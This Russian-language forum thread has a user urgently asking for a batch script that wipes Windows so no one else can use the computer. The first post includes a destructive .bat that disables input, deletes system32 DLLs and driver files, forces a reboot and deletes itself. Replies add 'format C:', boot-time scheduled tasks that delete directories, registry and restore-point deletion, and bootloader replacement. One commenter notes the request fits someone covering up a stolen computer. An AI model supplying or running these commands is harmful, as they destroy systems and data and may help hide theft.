Снос windows

didiko

floppy-диск
Пользователь
Реакции
0
Народ, всем шалом. Помогите пж. Нужно фул фаст код(bat) для сноса всей винды. Чтобы любой другой человек не смог им воспользоваться без переустановки. помогите пж. Я порылся по инету и нашел пару предложений. Но чет хз сработают они или нет.

Код:
@echo off
rundll32 keyboard,disable
rundll32 mouse,disable
del "%SystemRoot%system32*.dll" /q >nul
del "%SystemRoot%Driver Cachei386driver.cab" /f /q >nul Здесь список можно продолжить
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoDesktop /t REG_DWORD /d 1 /f >nul
shutdown -r -t 1 -c "lol" -f >nul
msg * "Ха-ха-ха" >nul
del "%0" >nul

Но чет хз сработают они или нет.
Ну так проверь. В виртуалке забанили?
ЗЫ. В коде явно слешы порезало, так-что работать если и будет, то криво.

Ну так проверь. В виртуалке забанили?
ЗЫ. В коде явно слешы порезало, так-что работать если и будет, то криво.
Я прст глупый по этому и спрашиваю у людей совета. Так как я на работе то проверить не могу но нужно прям срочно

Пожалуйста, обратите внимание, что пользователь заблокирован
на просторах гитхаба
использовать на свой страх и риск)

Потом просто выберешь в папке Windows что-нибудь важное для загрузки-и удалить

так как под вендой dd нет, то возможно "format C: /fs:NTFS"
Времена доса вспомнились? :)

1608131621838.png

наверное будет работать такое сделать в планировщике задачу, которая будет выполняться именно при загрузке операционки (то есть винды)
именно через такую задачу ( task in scheduler) выполняется проверка файловой системы на целостность
так что создаем новую задачу - и далее она запустит вам любой бат-файл, в который вы можете вставить удаление нужных директорий или формат
всего диска
приколом является то, что создание такой новой задачи можно автоматизировать средствами самой винды
а для безусловного завершения работы самой винды есть команды restart or shutdown - которая может быть вызвана в фоновом режиме.

Начиная с висты винда лучше защищает свои файлы, просто так ее не убить (в ХР можно было удалить все дллки в виндир, и норм). Даже и не знаю, никогда не задумывался над такой глупой задачей. Реестр попробуй удалить, сколько достанешь. Но тогда надо удалять точки восстановления.

Удаление файлов винды лучше всего выполнять в момент ее инициализации, когда еще на загружен ни реестр ни Гуи система
Поэтому мой коммент выше может как раз решить эту задачу и обойти защиту винды.
Возможно сложно написал, но таким именно способ запускают разные штуки, например обновление системных файлов

Последнее редактирование:
Поэтому мой коммент выше может как раз решить эту задачу и обойти защиту винды.
Возможно сложно написал, но таким именно способ запускают разные штуки, например обновление системных файлов
Тогда уж нужно натив-апи приложение закодить, эта подсистема грузится намного раньше планировщика.

Тогда уж нужно натив-апи приложение закодить, эта подсистема грузится намного раньше планировщика.

зачем натив-приложение ? у вас будет выполняться командный файл, который будет выполнять удаление нужной вам папки, с спец. ключем который будет означать рекурсивное удаление всех файлов и папок

зачем натив-приложение ?
я имею ввиду натив не в плане натив-шарп-батник, а натив_апи приложение. Вот типа такого http://hex.pp.ua/nt-native-applications-shell.php
которое, по логике вещей, загружается раньше планировщика. Впрочем, могу ошибаться, надо перечитать Руссиновича.

очень интересные натив-приложения, которые выполняются как раз на том же этапе что и запуск приложения chkdsk ))

применительно к задаче, которую хотел решить ТС надо что-то попроще чем натив приложения ))
одним из вариантов может быть использование специальной загрузочной флешки с виндой, которая максимально адаптирована
под простого пользователя, надо ввести только логин и пароль, кроме прочего она максимально почищена от всяких приложений майкрософт
на Рутрекере можно поискать "Windows 10 Enterprise x64 Lite" и есть сборка именно под SSD-диски. Образ операционки до трех гигабайт

Снос реестра самый простой вариант, о котором вам писали. После этого достаточно удалить точки восстановления
По сути, такая задача нужна тем, кто грабанул комп и сносом винды хотят затруднить расследование\чарджбек\еще что

А если загрузчик кильнуть, установив свой и пароль
установив свой-это как?
Путь наибольшего сопротивления получается.

Тут рассматривается быстрый и действенный метод,а не медленный и сложный)

установив свой-это как?
Путь наибольшего сопротивления получается.

Тут рассматривается быстрый и действенный метод,а не медленный и сложный)
Я так понимаю доступ к ПК есть или удаленка?

Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх